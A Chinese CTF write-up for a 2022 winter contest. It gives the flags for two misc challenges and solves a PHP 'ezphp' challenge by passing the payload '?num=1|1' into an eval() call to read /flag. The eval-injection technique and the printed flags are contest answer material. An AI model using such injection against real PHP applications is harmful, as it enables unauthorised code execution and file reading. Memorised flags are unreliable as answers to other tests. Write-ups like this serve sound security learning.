当前位置: 首页 > news >正文

[ CTF ] WriteUp-2022年春秋杯网络安全联赛-冬季赛

没啥时间打比赛就大概看了一下做了几题

文章目录

  • [Misc] reindeer game
  • [Misc] 调查问卷
  • [Web] ezphp

[Misc] reindeer game

​ 这题最简单的方法就是玩游戏了,然后直接出flag

在这里插入图片描述

flag{82a2acb6-9803-4936-92db-f1431d90c6d1}

[Misc] 调查问卷

在这里插入图片描述

flag{the_harder_u_struggle_today_the_more_glorious_u_will be_tomorrow}

​ 这个flag很有意思

[Web] ezphp

题目如下:

<?php
    highlight_file(__FILE__);
	$num = $_GET['num'];
	if(is_string($num) && strlen($num) < 5 && strpos($num,'111') === false && strpos($num,'0') === false && eval("return 111===${num}")){
        readfile('/flag');
    }
?>
Warning: Undefined array key "num" in /vat/www/html/index.php on line 3

​ 这个东西的话直接用“|”截断就行了,payload如下:

?num=1|1

flag{d6c6b32c-c514-4ddd-9265-4f3922012370}

在这里插入图片描述

相关文章:

  • 知识付费海哥:知识变现三剑客
  • synchronized原理剖析与优化视频教程
  • 马上又是新的一年了 “跨年倒计时”送给大家
  • 【Flask框架】——28 Flask_SQLAlchemy
  • Debian系列-开机启动程序
  • Redis中的哨兵机制
  • Weda创建视图表格
  • C++类和对象概念及实现详解(下篇)
  • 第三十二章 数论——组合数详解(1)
  • 卡尔曼滤波器 预测 odom 里程计轨迹的代码
  • 海豚dolphinscheduler 通过shell 调用.sql文件 传参
  • JavaScript奇淫技巧:变速齿轮
  • Git常见问题总结
  • 初识Spring
  • 【踩坑记录】Electron+vue实现热更新
  • 《深入 React 技术栈》
  • 【140天】尚学堂高淇Java300集视频精华笔记(86-87)
  • git 常用命令
  • IDEA常用插件整理
  • JavaScript 事件——“事件类型”中“HTML5事件”的注意要点
  • java中具有继承关系的类及其对象初始化顺序
  • leetcode378. Kth Smallest Element in a Sorted Matrix
  • mysql innodb 索引使用指南
  • OpenStack安装流程(juno版)- 添加网络服务(neutron)- controller节点
  • SQLServer之创建数据库快照
  • vue+element后台管理系统,从后端获取路由表,并正常渲染
  • WebSocket使用
  • 从重复到重用
  • 搭建gitbook 和 访问权限认证
  • 聚类分析——Kmeans
  • 老板让我十分钟上手nx-admin
  • 中文输入法与React文本输入框的问题与解决方案
  • Oracle Portal 11g Diagnostics using Remote Diagnostic Agent (RDA) [ID 1059805.
  • 教程:使用iPhone相机和openCV来完成3D重建(第一部分) ...
  • 智能情侣枕Pillow Talk,倾听彼此的心跳
  • #《AI中文版》V3 第 1 章 概述
  • #includecmath
  • #调用传感器数据_Flink使用函数之监控传感器温度上升提醒
  • $(function(){})与(function($){....})(jQuery)的区别
  • (175)FPGA门控时钟技术
  • (6)STL算法之转换
  • (day 2)JavaScript学习笔记(基础之变量、常量和注释)
  • (附源码)ssm航空客运订票系统 毕业设计 141612
  • (附源码)ssm跨平台教学系统 毕业设计 280843
  • (四)库存超卖案例实战——优化redis分布式锁
  • (学习日记)2024.01.19
  • (终章)[图像识别]13.OpenCV案例 自定义训练集分类器物体检测
  • (转)chrome浏览器收藏夹(书签)的导出与导入
  • (转)拼包函数及网络封包的异常处理(含代码)
  • .net 7 上传文件踩坑
  • .Net FrameWork总结
  • .NET LINQ 通常分 Syntax Query 和Syntax Method
  • .net 写了一个支持重试、熔断和超时策略的 HttpClient 实例池
  • .NET简谈互操作(五:基础知识之Dynamic平台调用)
  • [\u4e00-\u9fa5] //匹配中文字符